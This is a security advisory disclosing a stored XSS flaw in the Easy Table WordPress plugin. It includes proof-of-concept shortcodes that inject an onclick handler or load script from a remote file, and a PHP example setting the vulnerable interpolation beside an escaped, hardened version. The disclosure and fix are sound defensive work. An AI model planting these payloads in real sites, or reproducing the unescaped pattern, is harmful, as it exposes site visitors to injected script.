Easy Table [Persistent XSS]
Description
The Easy Table plugin is vulnerable to a persistent (stored) XSS attack.
The plugin allows users to easily create tables in posts, pages, widgets etc. by providing a shortcode that uses a custom syntax to represent table rows, columns, headers etc. This shortcode accepts many parameters in order to give users more flexibility over the end result. The problem is that many of these parameters are not properly sanitized before being stored in the database or printed to the browser, which allows a malicious user to perform a stored XSS attack.
To perform this attack, an attacker must have the edit_posts capability, so typically at least the contributor role must be assigned to them.
The plugin also offers functionality to read table data from a remote file. The file contents are parsed and printed without escaping HTML entities, giving a malicious user another entry point. This functionality is disabled by default and requires a user with administrative rights to enable it.
PoC
Create a post and enter the following shortcode:
[table class='class" onclick="alert(/XSS/)']
no,head1,head2,head3,head4
1,row1col1,row1col2,row1col3,100
[/table]
Or, using a remote file if the appropriate option is enabled:
[table file='http://wp1.dev/mal.html']
no,head1,head2,head3,head4
1,row1col1,row1col2,row1col3,100
[/table]
The contents of the remote file are parsed as a CSV file and are not escaped before printing, so the following response will be executed as JS code:
<script>alert('XSS')</script>
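The following hypothetical shortcode handler (added here as an illustration; it is not Easy Table's code) shows the vulnerable attribute interpolation described above beside the hardened form. It assumes WordPress is loaded (add_shortcode, shortcode_atts, esc_attr, esc_html are WordPress core functions); the shortcode tag example_table is an assumed name.

```php
<?php
// Hypothetical handler for a CSV-style table shortcode (assumed name: example_table).
// Assumes WordPress core is loaded so add_shortcode/shortcode_atts/esc_attr/esc_html exist.

function example_table_shortcode( $atts, $content = '' ) {
    // Default values for the attributes the shortcode accepts.
    $atts = shortcode_atts(
        array( 'class' => 'easy-table' ),
        $atts,
        'example_table'
    );

    // VULNERABLE pattern: raw interpolation of a user-supplied attribute.
    // A value such as  class" onclick="alert(/XSS/)  closes the class
    // attribute and injects an event handler into the <table> tag.
    // $html = '<table class="' . $atts['class'] . '">';

    // HARDENED: esc_attr() encodes quotes and angle brackets, so the whole
    // value stays inside the class attribute no matter what it contains.
    $html = '<table class="' . esc_attr( $atts['class'] ) . '">';

    // Parse the CSV-like body; the first non-empty line is the header row.
    // The same escaping applies to rows fetched from a remote file.
    $lines = array_filter( array_map( 'trim', explode( "\n", trim( $content ) ) ) );
    $first = true;
    foreach ( $lines as $line ) {
        $tag   = $first ? 'th' : 'td';
        $cells = str_getcsv( $line );
        $html .= '<tr>';
        foreach ( $cells as $cell ) {
            // esc_html() turns <script> and similar markup into inert text.
            $html .= "<$tag>" . esc_html( $cell ) . "</$tag>";
        }
        $html .= '</tr>';
        $first = false;
    }
    return $html . '</table>';
}
add_shortcode( 'example_table', 'example_table_shortcode' );
```

With the hardened handler, the class value from the PoC above is rendered as the literal text class&quot; onclick=&quot;alert(/XSS/) inside the attribute, and the remote-file script tag appears as text in a cell rather than executing.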
- 6 April 2016
- Pan Vag
- takien.com
- Easy Table
- WordPress 4.4.2